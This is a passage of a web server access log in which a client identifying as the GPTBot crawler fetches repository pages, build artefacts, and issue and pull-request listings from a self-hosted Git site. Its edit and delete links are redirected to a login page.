"/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26375] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26378] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26375] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11528] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 21618] [Gzip 10.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14112] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15221] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 11119] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 4663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 23750] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:19:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 6319] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 11096] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:19:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 11096] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 